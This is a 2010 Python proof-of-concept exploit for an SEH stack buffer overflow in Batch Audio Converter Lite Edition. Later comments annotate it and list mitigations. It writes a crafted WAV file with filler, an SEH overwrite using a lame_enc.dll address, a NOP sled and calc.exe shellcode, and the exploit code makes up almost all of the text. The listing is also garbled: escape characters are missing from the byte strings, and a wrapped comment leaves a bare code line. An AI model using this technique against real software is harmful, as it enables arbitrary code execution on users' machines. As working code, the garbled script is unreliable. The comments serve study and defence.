# Title : Batch Audio Converter Lite Edition <= v1.0.0.0 Stack Buffer Overflow (SEH)
# Published : 2010-06-17
# Author : modpr0be
# Software Link: http://www.freesoftwaretoolbox.com/files/batchaudio_setup.exe
# Tested on: Windows XP SP2
# Type of Vuln: SEH
# Code : bacon-exploit.py
# Greetz: Otoy, Postnix, Jasakom Community, Kilurah, Gesang, dan wedus-wedus lainnya ^^
# Thanks: All OffSec member
#!/usr/bin/python
import struct
# Pieces of the malformed input, in the order they are later concatenated:
# filler, next-SEH field, SEH handler pointer, padding.
# NOTE(review): the "x.." literals in this listing are plain ASCII as printed
# (the characters 'x', 'e', 'b', ...), not raw byte values; the listing's
# escape characters appear to have been lost in extraction, so the strings
# shown here are not the bytes the inline comments describe.

# 4132 filler characters. Given the page title (stack buffer overflow, SEH),
# this is presumably the distance to the exception registration record on the
# tested build (Windows XP SP2 per the header) - not verifiable from here.
junk = "A" * 4132
# Value intended for the record's "next" field (name suggests next-SEH).
nseh = "xebx06x90x90"
# Handler pointer: 0x10029bb7 packed as a little-endian unsigned 32-bit value.
# The author's trailing comment ("pop edi pop esi ret from lame_enc.dll") is
# wrapped onto the following line in this listing.
# NOTE(review): a hard-coded address inside a DLL shipped with the product is
# only stable if that module loads at a fixed base and is not covered by
# SafeSEH; presumably that holds for the tested build - confirm. Building all
# bundled modules with SafeSEH and ASLR, and enabling SEHOP, are the relevant
# mitigations for this class of bug.
seh = struct.pack('<L', 0x10029bb7) # pop edi pop esi ret from
lame_enc.dll
# Thirty repetitions of the literal, used as padding ahead of the payload.
nop = "x90" * 30
# Progress message (Python 2 print statement).
print "[+] Preparing for file.."
# Proof-of-concept payload. Per the author's notes below it launches calc.exe,
# i.e. a visible marker that execution was redirected, and is 463 bytes after
# alphanumeric encoding.
# NOTE(review): as printed, the literal is ASCII text with the escape
# characters missing, so its length and content do not match the 463 bytes
# described; treat this listing as documentation of the technique only.
# windows/exec, CMD=calc.exe, EXITFUNC=seh
# 463 bytes, x86/alpha_mixed
shellcode = ("x89xe3xdbxc6xd9x73xf4x5ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax43x43x43x43x43x43x37x52x59x6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x49"
"x6cx49x78x4dx59x47x70x45x50x45x50x43x50x4cx49"
"x48x65x45x61x4ex32x42x44x4ex6bx50x52x44x70x4c"
"x4bx50x52x44x4cx4ex6bx42x72x45x44x4cx4bx43x42"
"x46x48x44x4fx4dx67x51x5ax46x46x44x71x4bx4fx44"
"x71x49x50x4ex4cx47x4cx51x71x51x6cx43x32x46x4c"
"x51x30x49x51x48x4fx46x6dx45x51x49x57x4dx32x48"
"x70x50x52x42x77x4cx4bx46x32x44x50x4cx4bx43x72"
"x47x4cx47x71x4ex30x4cx4bx47x30x51x68x4fx75x4f"
"x30x42x54x42x6ax46x61x4ax70x46x30x4cx4bx43x78"
"x46x78x4ex6bx43x68x47x50x45x51x4bx63x4bx53x47"
"x4cx47x39x4ex6bx47x44x4ex6bx46x61x48x56x50x31"
"x49x6fx50x31x4fx30x4cx6cx4bx71x4ax6fx44x4dx46"
"x61x48x47x46x58x4dx30x44x35x49x64x43x33x43x4d"
"x48x78x47x4bx51x6dx47x54x51x65x4bx52x43x68x4e"
"x6bx46x38x47x54x47x71x4ex33x43x56x4ex6bx46x6c"
"x50x4bx4cx4bx50x58x45x4cx46x61x4bx63x4ex6bx47"
"x74x4cx4bx43x31x4ax70x4cx49x42x64x44x64x46x44"
"x51x4bx51x4bx43x51x46x39x50x5ax42x71x4bx4fx4b"
"x50x46x38x51x4fx50x5ax4ex6bx45x42x48x6bx4cx46"
"x51x4dx51x7ax46x61x4cx4dx4fx75x4fx49x47x70x43"
"x30x43x30x46x30x42x48x50x31x4ex6bx50x6fx4dx57"
"x49x6fx4bx65x4fx4bx4bx4ex46x6ex50x32x49x7ax43"
"x58x4cx66x4fx65x4fx4dx4fx6dx4bx4fx48x55x47x4c"
"x47x76x51x6cx45x5ax4dx50x4bx4bx4dx30x44x35x43"
"x35x4dx6bx47x37x45x43x42x52x50x6fx51x7ax45x50"
"x51x43x49x6fx4bx65x43x53x45x31x42x4cx43x53x46"
"x4ex45x35x51x68x42x45x43x30x45x5ax41x41")
# Write the concatenated buffer to exploit.wav in the current directory.
# The output carries a .wav extension but, as built here, starts with the
# filler run rather than a RIFF/WAVE header - a mismatch between extension and
# content that file-type validation or content inspection can flag.
# The handle is opened in text mode and closed explicitly (no `with`), so an
# exception raised by write() would leave it open.
f = open('exploit.wav', 'w')
print "[+] Writing vulnerable WAV file.."
# Order matters: filler, next-SEH field, handler pointer, padding, payload.
f.write(junk+nseh+seh+nop+shellcode)
f.close()
print "[+] Success writing file.."